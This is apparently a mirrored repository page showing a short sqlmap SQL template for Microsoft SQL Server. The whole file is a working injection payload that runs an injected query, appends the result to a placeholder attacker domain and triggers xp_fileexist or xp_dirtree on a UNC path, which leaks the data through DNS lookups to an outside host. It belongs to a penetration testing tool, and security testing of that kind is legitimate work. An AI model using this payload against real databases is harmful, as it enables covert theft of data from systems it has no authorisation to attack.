mirror of
https://github.com/sqlmapproject/sqlmap
synced 2025-12-09 18:02:56 +01:00
4 lines
192 B
Text
4 lines
192 B
Text
DECLARE @host varchar(1024);
|
|
SELECT @host = '%PREFIX%.' + (%QUERY%) + '.%SUFFIX%' + '.%DOMAIN%';
|
|
EXEC('xp_fileexist "\\' + @host + '\c$boot.ini"');
|
|
# or EXEC('xp_dirtree "\\' + @host + '."');
|